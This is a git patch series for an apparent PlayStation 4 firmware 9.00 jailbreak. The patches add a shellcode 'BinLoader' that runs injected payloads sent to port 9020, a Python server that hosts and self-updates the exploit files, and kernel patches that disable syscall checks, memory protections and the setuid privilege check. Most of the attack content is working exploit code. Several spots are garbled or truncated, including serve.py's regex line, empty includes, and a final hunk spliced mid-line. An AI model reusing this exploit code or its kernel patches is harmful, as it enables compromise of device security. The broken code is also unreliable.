From f87aa8cd131c045ee08c6503bae61fd2ccf63f1d Mon Sep 17 00:00:00 2001
From: Nazky <56560636+Nazky@users.noreply.github.com>
Date: Thu, 29 May 2025 14:48:47 +0200
Subject: [PATCH 1/4] add binloader + malloc fix
---
lapse.mjs | 84 +++++++++++++++----
payload.js | 16 ++--
serve.py | 237 +++++++++++++++++++++++++++++++++++++++++++++++++++++
3 files changed, 315 insertions(+), 22 deletions(-)
create mode 100755 serve.py
diff --git a/lapse.mjs b/lapse.mjs
index 57fd6bf..70c819a 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1659,11 +1659,17 @@ export async function kexploit() {
await init();
const _init_t2 = performance.now();
+ if(sessionStorage.getItem('binloader')){
+ runBinLoader();
+ return new Promise(() => {});
+ }
+
// If setuid is successful, we dont need to run the kexploit again
try {
if (sysi('setuid', 0) == 0) {
- log("Not running kexploit again.")
- return;
+ log("Not running kexploit again.");
+ runBinLoader();
+ return new Promise(() => {});
}
}
catch (e) {}
@@ -1743,6 +1749,49 @@ export async function kexploit() {
}
}
+function runBinLoader() {
+ /* BinLoader by ps3120 */
+ var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
+ var payload_loader = malloc32(0x1000);
+ var BLDR = payload_loader.backing;
+ BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
+ BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
+ BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
+ BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
+ BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
+ BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
+ BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
+ BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
+ BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
+ BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
+ BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
+ BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
+ BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
+ BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
+ BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
+ BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
+ BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
+ BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
+ BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
+ BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
+ BLDR[60] = 0xC3050FCA;
+
+ chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
+
+ var pthread = malloc(0x10);
+ sysi('mlock', payload_buffer, 0x300000);
+
+ call_nze(
+ 'pthread_create',
+ pthread,
+ 0,
+ payload_loader,
+ payload_buffer
+ );
+
+ log('BinLoader is ready. Send a payload to port 9020 now');
+}
+
//For some reason this payload loader version does KP.
/*kexploit().then(() => {
var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
@@ -1762,22 +1811,23 @@ export async function kexploit() {
})*/
-kexploit().then(() => {
- function malloc(sz) {
- var backing = new Uint8Array(0x10000 + sz);
- nogc.push(backing);
- var ptr = mem.readp(mem.addrof(backing).add(0x10));
- ptr.backing = backing;
- return ptr;
- }
+function malloc(sz) {
+ var backing = new Uint8Array(0x10000 + sz);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = backing;
+ return ptr;
+}
- function malloc32(sz) {
- var backing = new Uint8Array(0x10000 + sz * 4);
- nogc.push(backing);
- var ptr = mem.readp(mem.addrof(backing).add(0x10));
- ptr.backing = new Uint32Array(backing.buffer);
- return ptr;
- }
+function malloc32(sz) {
+ var backing = new Uint8Array(0x10000 + sz * 4);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = new Uint32Array(backing.buffer);
+ return ptr;
+}
+
+kexploit().then(() => {
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
diff --git a/payload.js b/payload.js
index f64dfc2..1ba4d7f 100644
--- a/payload.js
+++ b/payload.js
@@ -1,6 +1,12 @@
-fetch('./payload.bin').then(res => {
- res.arrayBuffer().then(arr => {
- window.pld = new Uint32Array(arr);
-
+if (sessionStorage.getItem('jbsuccess')) {
+ sessionStorage.setItem('binloader', 1);
+} else {
+ sessionStorage.removeItem('binloader');
+ fetch('./payload.bin').then(res => {
+ res.arrayBuffer().then(arr => {
+ window.pld = new Uint32Array(arr);
+ sessionStorage.setItem('jbsuccess', 1);
+ })
})
-})
\ No newline at end of file
+}
+
diff --git a/serve.py b/serve.py
new file mode 100755
index 0000000..7bdc501
--- /dev/null
+++ b/serve.py
@@ -0,0 +1,237 @@
+import sys
+import socket
+import os
+from http.server import SimpleHTTPRequestHandler
+from socketserver import TCPServer
+from rich.console import Console
+from rich.panel import Panel
+from rich.text import Text
+import json
+from datetime import datetime
+import hashlib
+import urllib.request
+import re
+
+console = Console()
+
+# Configuration for manifest generation
+EXCLUDED_DIRS = {'.venv', '.git', 'noneed'}
+EXCLUDED_EXTENSIONS = {
+ '.bat', '.txt', '.exe', '.mp4', '.py', '.bak', '.zip',
+ '.mp3', '.sh', '.h', '.c', '.o', '.ld', '.md', '.d'
+}
+EXCLUDED_FILES = {'.gitignore', 'COPYING', 'LICENSE', 'MAKEFILE', 'dockerfile'}
+OUTPUT_FILE = 'PSFree.manifest'
+
+def get_machine_ip():
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ try:
+ # doesn't have to be reachable
+ s.connect(('8.8.8.8', 80))
+ ip = s.getsockname()[0]
+ except Exception:
+ ip = '127.0.0.1'
+ finally:
+ s.close()
+ return ip
+
+def is_docker():
+ # Check for .dockerenv file
+ if os.path.exists('/.dockerenv'):
+ return True
+ # Check cgroup info for docker
+ try:
+ with open('/proc/1/cgroup', 'rt') as f:
+ return 'docker' in f.read() or 'kubepods' in f.read()
+ except Exception:
+ return False
+
+def get_host_ip():
+ try:
+ # Try resolving Docker internal host (works on Docker Desktop and configured Linux setups)
+ host_ip = socket.gethostbyname('host.docker.internal')
+ return host_ip
+ except socket.error:
+ # Fallback if not resolved, may use default gateway IP (requires extra code) or local IP
+ return 'Could not determine host IP'
+
+def get_ipv4():
+ if is_docker():
+ ip = get_host_ip()
+ if ip:
+ print(f"Running inside Docker. Host IPv4: {ip}")
+ else:
+ print("Running inside Docker, but could not resolve host.docker.internal.")
+ else:
+ ip = get_machine_ip()
+ print(f"Not in Docker. Machine IPv4: {ip}")
+ return ip
+
+def create_manifest():
+ root_dir = os.path.dirname(os.path.abspath(__file__))
+ manifest_path = os.path.join(root_dir, OUTPUT_FILE)
+ with open(manifest_path, 'w', encoding='utf-8') as f:
+ # Write header
+ f.write("CACHE MANIFEST\n")
+ f.write(f"# v1\n")
+ f.write(f"# Generated on {datetime.now()}\n\n")
+ f.write("CACHE:\n")
+ # Walk through all files
+ for dirpath, dirnames, filenames in os.walk(root_dir):
+ # Remove excluded directories (modifies the dirnames list in-place)
+ dirnames[:] = [d for d in dirnames if d not in EXCLUDED_DIRS]
+ for filename in filenames:
+ filepath = os.path.join(dirpath, filename)
+ relpath = os.path.relpath(filepath, root_dir)
+ # Skip excluded files, extensions and the manifest file itself
+ ext = os.path.splitext(filename)[1].lower()
+ if (ext in EXCLUDED_EXTENSIONS or
+ filename in EXCLUDED_FILES or
+ filename == OUTPUT_FILE):
+ continue
+ # Write relative path to manifest
+ f.write(f"{relpath.replace(os.sep, '/')}\n")
+ # Write network section
+ f.write("\nNETWORK:\n")
+ f.write("*\n")
+
+
+class CustomHandler(SimpleHTTPRequestHandler):
+
+ def do_POST(self):
+ if self.path == '/generate_manifest':
+ try:
+ create_manifest()
+ response = {
+ 'status': 'success',
+ 'message': f'{OUTPUT_FILE} created successfully.\nThe cache has been updated, Please refresh the page.'
+ }
+ self.send_response(200)
+ except Exception as e:
+ response = {
+ 'status': 'error',
+ 'message': f"{str(e)}\nThis option only works on local server!\nPlease make sure your server is up."
+ }
+ self.send_response(500)
+ self.send_header('Content-Type', 'application/json')
+ self.end_headers()
+ self.wfile.write(json.dumps(response).encode('utf-8'))
+
+ elif self.path == '/update_exploit':
+ root_dir = os.path.abspath(os.path.dirname(__file__))
+ files_to_update = [
+ ("psfree/lapse.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/lapse.mjs"),
+ ("psfree/psfree.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/psfree.mjs"),
+ ("psfree/config.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/config.mjs"),
+ ("psfree/send.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/send.mjs"),
+ ("psfree/kpatch/900.elf", "https://raw.githubusercontent.com/kmeps4/PSFree/main/kpatch/900.elf"),
+ ("psfree/rop/900.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/rop/900.mjs"),
+ #("module/chain.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/chain.mjs"),
+ ("psfree/module/constants.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/constants.mjs"),
+ ("psfree/module/int64.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/int64.mjs"),
+ ("psfree/module/mem.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/mem.mjs"),
+ ("psfree/module/memtools.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/memtools.mjs"),
+ ("psfree/module/offset.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/offset.mjs"),
+ ("psfree/module/rw.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/rw.mjs"),
+ ("psfree/module/utils.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/utils.mjs"),
+ #("module/view.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/view.mjs")
+ ]
+ results = []
+
+ #def file_hash(data):
+ # return hashlib.sha256(data).hexdigest()
+
+ def is_mjs_file(filename):
+ return filename.lower().endswith('.mjs')
+
+ for local_rel_path, url in files_to_update:
+ try:
+ abs_local_path = os.path.abspath(os.path.join(root_dir, local_rel_path))
+ if not abs_local_path.startswith(root_dir):
+ raise ValueError(f"Invalid path {local_rel_path}")
+
+ # Attempt to download file
+ try:
+ with urllib.request.urlopen(url) as response:
+ raw_data = response.read()
+ except Exception as download_error:
+ results.append(f"{local_rel_path}: download failed ({download_error})")
+ continue # skip to next file
+
+ # If .mjs file, decode, replace strings using regex, then encode back
+ if is_mjs_file(local_rel_path):
+ text_data = raw_data.decode('utf-8')
+ text_data = re.sub(r'(? 1:
+ try:
+ PORT = int(sys.argv[1])
+ except ValueError:
+ console.print("[bold red]Usage:[/] python serve.py [port]", style="red")
+ sys.exit(1)
+
+console.print(Panel(Text("Simple Python HTTP Server", style="bold white on blue"),
+ subtitle="Press [bold yellow]Ctrl+C[/] to stop the server", expand=False))
+
+console.print(
+ f"[green]Server is running![/]\n"
+ f"Listening on [bold magenta]http://{IP}:{PORT}/PSFree[/]\n",
+ style="bold",
+)
+
+try:
+ with TCPServer(("0.0.0.0", PORT), CustomHandler) as httpd:
+ httpd.serve_forever()
+except KeyboardInterrupt:
+ console.print("\n[bold red]Server stopped by user.[/]")
+except OSError as e:
+ console.print(f"[bold red]Error:[/] {e}")
\ No newline at end of file
From ffd8a6ffff5e07b2622a676806df84eed6572ff0 Mon Sep 17 00:00:00 2001
From: Nazky <56560636+Nazky@users.noreply.github.com>
Date: Thu, 29 May 2025 14:51:22 +0200
Subject: [PATCH 2/4] Delete serve.py
---
serve.py | 237 -------------------------------------------------------
1 file changed, 237 deletions(-)
delete mode 100755 serve.py
diff --git a/serve.py b/serve.py
deleted file mode 100755
index 7bdc501..0000000
--- a/serve.py
+++ /dev/null
@@ -1,237 +0,0 @@
-import sys
-import socket
-import os
-from http.server import SimpleHTTPRequestHandler
-from socketserver import TCPServer
-from rich.console import Console
-from rich.panel import Panel
-from rich.text import Text
-import json
-from datetime import datetime
-import hashlib
-import urllib.request
-import re
-
-console = Console()
-
-# Configuration for manifest generation
-EXCLUDED_DIRS = {'.venv', '.git', 'noneed'}
-EXCLUDED_EXTENSIONS = {
- '.bat', '.txt', '.exe', '.mp4', '.py', '.bak', '.zip',
- '.mp3', '.sh', '.h', '.c', '.o', '.ld', '.md', '.d'
-}
-EXCLUDED_FILES = {'.gitignore', 'COPYING', 'LICENSE', 'MAKEFILE', 'dockerfile'}
-OUTPUT_FILE = 'PSFree.manifest'
-
-def get_machine_ip():
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- try:
- # doesn't have to be reachable
- s.connect(('8.8.8.8', 80))
- ip = s.getsockname()[0]
- except Exception:
- ip = '127.0.0.1'
- finally:
- s.close()
- return ip
-
-def is_docker():
- # Check for .dockerenv file
- if os.path.exists('/.dockerenv'):
- return True
- # Check cgroup info for docker
- try:
- with open('/proc/1/cgroup', 'rt') as f:
- return 'docker' in f.read() or 'kubepods' in f.read()
- except Exception:
- return False
-
-def get_host_ip():
- try:
- # Try resolving Docker internal host (works on Docker Desktop and configured Linux setups)
- host_ip = socket.gethostbyname('host.docker.internal')
- return host_ip
- except socket.error:
- # Fallback if not resolved, may use default gateway IP (requires extra code) or local IP
- return 'Could not determine host IP'
-
-def get_ipv4():
- if is_docker():
- ip = get_host_ip()
- if ip:
- print(f"Running inside Docker. Host IPv4: {ip}")
- else:
- print("Running inside Docker, but could not resolve host.docker.internal.")
- else:
- ip = get_machine_ip()
- print(f"Not in Docker. Machine IPv4: {ip}")
- return ip
-
-def create_manifest():
- root_dir = os.path.dirname(os.path.abspath(__file__))
- manifest_path = os.path.join(root_dir, OUTPUT_FILE)
- with open(manifest_path, 'w', encoding='utf-8') as f:
- # Write header
- f.write("CACHE MANIFEST\n")
- f.write(f"# v1\n")
- f.write(f"# Generated on {datetime.now()}\n\n")
- f.write("CACHE:\n")
- # Walk through all files
- for dirpath, dirnames, filenames in os.walk(root_dir):
- # Remove excluded directories (modifies the dirnames list in-place)
- dirnames[:] = [d for d in dirnames if d not in EXCLUDED_DIRS]
- for filename in filenames:
- filepath = os.path.join(dirpath, filename)
- relpath = os.path.relpath(filepath, root_dir)
- # Skip excluded files, extensions and the manifest file itself
- ext = os.path.splitext(filename)[1].lower()
- if (ext in EXCLUDED_EXTENSIONS or
- filename in EXCLUDED_FILES or
- filename == OUTPUT_FILE):
- continue
- # Write relative path to manifest
- f.write(f"{relpath.replace(os.sep, '/')}\n")
- # Write network section
- f.write("\nNETWORK:\n")
- f.write("*\n")
-
-
-class CustomHandler(SimpleHTTPRequestHandler):
-
- def do_POST(self):
- if self.path == '/generate_manifest':
- try:
- create_manifest()
- response = {
- 'status': 'success',
- 'message': f'{OUTPUT_FILE} created successfully.\nThe cache has been updated, Please refresh the page.'
- }
- self.send_response(200)
- except Exception as e:
- response = {
- 'status': 'error',
- 'message': f"{str(e)}\nThis option only works on local server!\nPlease make sure your server is up."
- }
- self.send_response(500)
- self.send_header('Content-Type', 'application/json')
- self.end_headers()
- self.wfile.write(json.dumps(response).encode('utf-8'))
-
- elif self.path == '/update_exploit':
- root_dir = os.path.abspath(os.path.dirname(__file__))
- files_to_update = [
- ("psfree/lapse.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/lapse.mjs"),
- ("psfree/psfree.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/psfree.mjs"),
- ("psfree/config.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/config.mjs"),
- ("psfree/send.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/refs/heads/main/send.mjs"),
- ("psfree/kpatch/900.elf", "https://raw.githubusercontent.com/kmeps4/PSFree/main/kpatch/900.elf"),
- ("psfree/rop/900.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/rop/900.mjs"),
- #("module/chain.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/chain.mjs"),
- ("psfree/module/constants.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/constants.mjs"),
- ("psfree/module/int64.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/int64.mjs"),
- ("psfree/module/mem.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/mem.mjs"),
- ("psfree/module/memtools.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/memtools.mjs"),
- ("psfree/module/offset.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/offset.mjs"),
- ("psfree/module/rw.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/rw.mjs"),
- ("psfree/module/utils.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/utils.mjs"),
- #("module/view.mjs", "https://raw.githubusercontent.com/kmeps4/PSFree/main/module/view.mjs")
- ]
- results = []
-
- #def file_hash(data):
- # return hashlib.sha256(data).hexdigest()
-
- def is_mjs_file(filename):
- return filename.lower().endswith('.mjs')
-
- for local_rel_path, url in files_to_update:
- try:
- abs_local_path = os.path.abspath(os.path.join(root_dir, local_rel_path))
- if not abs_local_path.startswith(root_dir):
- raise ValueError(f"Invalid path {local_rel_path}")
-
- # Attempt to download file
- try:
- with urllib.request.urlopen(url) as response:
- raw_data = response.read()
- except Exception as download_error:
- results.append(f"{local_rel_path}: download failed ({download_error})")
- continue # skip to next file
-
- # If .mjs file, decode, replace strings using regex, then encode back
- if is_mjs_file(local_rel_path):
- text_data = raw_data.decode('utf-8')
- text_data = re.sub(r'(? 1:
- try:
- PORT = int(sys.argv[1])
- except ValueError:
- console.print("[bold red]Usage:[/] python serve.py [port]", style="red")
- sys.exit(1)
-
-console.print(Panel(Text("Simple Python HTTP Server", style="bold white on blue"),
- subtitle="Press [bold yellow]Ctrl+C[/] to stop the server", expand=False))
-
-console.print(
- f"[green]Server is running![/]\n"
- f"Listening on [bold magenta]http://{IP}:{PORT}/PSFree[/]\n",
- style="bold",
-)
-
-try:
- with TCPServer(("0.0.0.0", PORT), CustomHandler) as httpd:
- httpd.serve_forever()
-except KeyboardInterrupt:
- console.print("\n[bold red]Server stopped by user.[/]")
-except OSError as e:
- console.print(f"[bold red]Error:[/] {e}")
\ No newline at end of file
From bf59500edfd6af50c66fe1865faf3d85f5eab019 Mon Sep 17 00:00:00 2001
From: Nazky <56560636+Nazky@users.noreply.github.com>
Date: Thu, 29 May 2025 20:28:45 +0200
Subject: [PATCH 3/4] revert + fix
---
kpatch/900.c | 159 +++++++++++++-----------------------------------
kpatch/900.elf | Bin 5224 -> 5288 bytes
kpatch/900.o | Bin 1840 -> 1912 bytes
lapse.mjs | 160 ++++++++++++++++++++++---------------------------
payload.js | 2 -
5 files changed, 114 insertions(+), 207 deletions(-)
mode change 100644 => 100755 lapse.mjs
diff --git a/kpatch/900.c b/kpatch/900.c
index ef99a9f..2ff5a67 100644
--- a/kpatch/900.c
+++ b/kpatch/900.c
@@ -16,7 +16,6 @@ You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
#include
-#include
#include "types.h"
#include "utils.h"
@@ -58,123 +57,51 @@ void do_patch(void) {
void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
disable_cr0_wp();
-
- // patch amd64_syscall() to allow calling syscalls everywhere
-
- // struct syscall_args sa; // initialized already
- // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
- // int is_invalid_syscall = 0
- //
- // // check the calling code if it looks like one of the syscall stubs at a
- // // libkernel library and check if the syscall number correponds to the
- // // proper stub
- // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
- // || sa.code != (u32)(code >> 0x10)
- // ) {
- // // patch this to " = 0" instead
- // is_invalid_syscall = -1;
- // }
- write32(kbase, 0x490, 0);
- // these code corresponds to the check that ensures that the caller's
- // instruction pointer is inside the libkernel library's memory range
- //
- // // patch the check to always go to the "goto do_syscall;" line
- // void *code = td->td_frame->tf_rip;
- // if (libkernel->start <= code && code < libkernel->end
- // && is_invalid_syscall == 0
- // ) {
- // goto do_syscall;
- // }
- //
- // do_syscall:
- // ...
- // lea rsi, [rbp - 0x78]
- // mov rdi, rbx
- // mov rax, qword [rbp - 0x80]
- // call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
- //
- // sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
- write8(kbase, 0x4c2, 0xeb);
-
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x16632a, 0x37);
- write8(kbase, 0x16632d, 0x37);
-
- // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
- //
- // this check is skipped after the patch
- //
- // if ((new_prot & current->max_protection) != new_prot) {
- // vm_map_unlock(map);
- // return (KERN_PROTECTION_FAILURE);
- // }
- write32(kbase, 0x80b8d, 0);
-
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
-
- // call ...
- // mov r14, qword [rbp - 0xad0]
- // cmp eax, 0x4000000
- // jb ... ; patch jb to jmp
- write8(kbase, 0x23B67F, 0xeb);
- // patch called function to always return 0
- //
- // sys_dynlib_dlsym:
- // ...
- // mov edi, 0x10 ; 16
- // call patched_function ; kernel_base + 0x951c0
- // test eax, eax
- // je ...
- // mov rax, qword [rbp - 0xad8]
- // ...
- // patched_function: ; patch to "xor eax, eax; ret"
- // push rbp
- // mov rbp, rsp
- // ...
- write32(kbase, 0x221B40, 0xC3C03148);
-
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x1A06, 0xeb);
-
- // patch sysveri to prevent delayed panics
- write16(kbase, 0x626874, 0x9090);
-
- // overwrite the entry of syscall 11 (unimplemented) in sysent
- //
- // struct args {
- // u64 rdi;
- // u64 rsi;
- // u64 rdx;
- // u64 rcx;
- // u64 r8;
- // u64 r9;
- // };
- //
- // int sys_kexec(struct thread td, struct args *uap) {
- // asm("jmp qword ptr [rsi]");
- // }
-
- // sysent[11]
+ //ChendoChap Patches For 900
+ const size_t KERNEL_enable_syscalls_1 = 0x490;
+ const size_t KERNEL_enable_syscalls_2 = 0x4B5;
+ const size_t KERNEL_enable_syscalls_3 = 0x4B9;
+ const size_t KERNEL_enable_syscalls_4 = 0x4C2;
+ const size_t KERNEL_mprotect = 0x80B8D;
+ const size_t KERNEL_prx = 0x23AEC4;
+ const size_t KERNEL_mmap_1 = 0x16632A;
+ const size_t KERNEL_mmap_2 = 0x16632D;
+ const size_t KERNEL_dlsym_1 = 0x23B67F;
+ const size_t KERNEL_dlsym_2 = 0x221b40;
+ const size_t KERNEL_setuid = 0x1A06;
+ const size_t KERNEL_bzero = 0x2713FD;
+ const size_t KERNEL_pagezero = 0x271441;
+ const size_t KERNEL_memcpy = 0x2714BD;
+ const size_t KERNEL_pagecopy = 0x271501;
+ const size_t KERNEL_copyin = 0x2716AD;
+ const size_t KERNEL_copyinstr = 0x271B5D;
+ const size_t KERNEL_copystr = 0x271C2D;
+ const size_t KERNEL_veriPatch = 0x626874;
+ const size_t KERNEL_setcr0_patch = 0x3ade3B;
+ write32(kbase, KERNEL_enable_syscalls_1, 0);
+ write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
+ write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
+ write8(kbase, KERNEL_enable_syscalls_4, 0xEB);
+ write8(kbase, KERNEL_mmap_1, 0x37);
+ write8(kbase, KERNEL_mmap_2, 0x37);
+ write32(kbase, KERNEL_mprotect, 0);
+ write8(kbase, KERNEL_dlsym_1, 0xEB);
+ write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
+ write8(kbase, KERNEL_setuid, 0xEB);
+ write16(kbase, KERNEL_prx, 0xE990);
+ write8(kbase, KERNEL_bzero, 0xEB);
+ write8(kbase, KERNEL_pagezero, 0xEB);
+ write8(kbase, KERNEL_memcpy, 0xEB);
+ write8(kbase, KERNEL_pagecopy, 0xEB);
+ write8(kbase, KERNEL_copyin, 0xEB);
+ write8(kbase, KERNEL_copyinstr, 0xEB);
+ write8(kbase, KERNEL_copystr, 0xEB);
+ write16(kbase, KERNEL_veriPatch, 0x9090);
+ write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
- // .sy_call = gadgets['jmp qword ptr [rsi]']
+ write32(kbase, offset_sysent_11, 2);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
- // .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, offset_sysent_11 + 0x2c, 1);
enable_cr0_wp();
}
\ No newline at end of file
diff --git a/kpatch/900.elf b/kpatch/900.elf
index 0e026118abcae72528a9f1c4e6a60ee592d6e1df..a38fa6b29ce522f871cba606f666f29f17bcfd66 100644
GIT binary patch
delta 284
zcmaE%u|ji#2IGr~n&yTV7#Y9-Ml%RN_yJE#Qdoe@HG&ZS8lXB(5P#!D7lFVd>y#NL
zygb(US6H3l^|3}r5iqqELNSVhd27YMRID_Z(v<;HX~!E&GLjf3OgP?Xeb0)4U+MVa
zqp77$cmTr=5FP+0WJzyJTgK`dsF0Maf%oH034P+lSgDD&k1|NjL*
zdJm9Z1Eeni>4^s=Ca(~*0P24zD9`w9GouhYBctDBPGNn{0I1UgCOZn7bHY6`xl!1j
V@xtVTK(b;oqli7@s>wiq008HyV7CAO
delta 219
zcmZ3X`9foY2IGo}n&yTR7#Y9-Ml%RN_yJE#Qdoe@96<;_2dIt{#NRm4MS!;?BZ*3u)`w1#BzL{JoC@d=S|Ns9@5Pb|1K-vX}S4^HMC@(SP-~azl
zfU+Ba^d2Dn21s83(i0C#OnxC~!I(2yQAnO~(`H8@c1A|7$)3XcoB~jr1tvENn{&e5
aG5MgdJ>!JQj3V}o7Ly%;WY*+H5p@9ju0Nyz
diff --git a/kpatch/900.o b/kpatch/900.o
index febc978bacf85ccb237eb121caa258325cc2f498..2e7e5bee06362fc07e6278ec171f0d5185fbb020 100644
GIT binary patch
delta 267
zcmdnM_k(YO2IG&3nim3(tW#!~@bXyWUtx8I*T)(iMZnZv2*oH0=B*V2Q?b%uN>>I*
zr5$f9$w*?DFyVNk^*t*Fex>7wk2fl?3NSKFW@8LiFw`^AGtf0GO)AYRDK)G!GSV|J
z(Nr)53o`)0UgcIe|q3
z#$3Rn!B{l;B#S*02lHeuRy)SN$)2qCOuHZo7qDtD9+-TR)t>ReWKK4FCJW}tUTk(u
b4os7~*z6czOg_nG&)L8Xv87_NAd5Tzq7qVd
delta 159
zcmeytw}Eeh2IGc_niqIWGLjf3OgP@Cz$(DVHrb0YSjJe-SkFM$tTd@KucXwd&d5a1
zz(iBQ5G*`-FJm<0rpb~_>lrs~KFQS2$n=h3aukahqu%6+EcQV1BA66pwP!lOG&zXX
zj?ruKL{@vovdI^LWW{7bHhabylLOi8nLaR0p2TLy^n-EoB{n<81(OBY?I%xQ {});
+ return;
}
}
catch (e) {}
@@ -1749,67 +1790,6 @@ export async function kexploit() {
}
}
-function runBinLoader() {
- /* BinLoader by ps3120 */
- var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
- var payload_loader = malloc32(0x1000);
- var BLDR = payload_loader.backing;
- BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
- BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
- BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
- BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
- BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
- BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
- BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
- BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
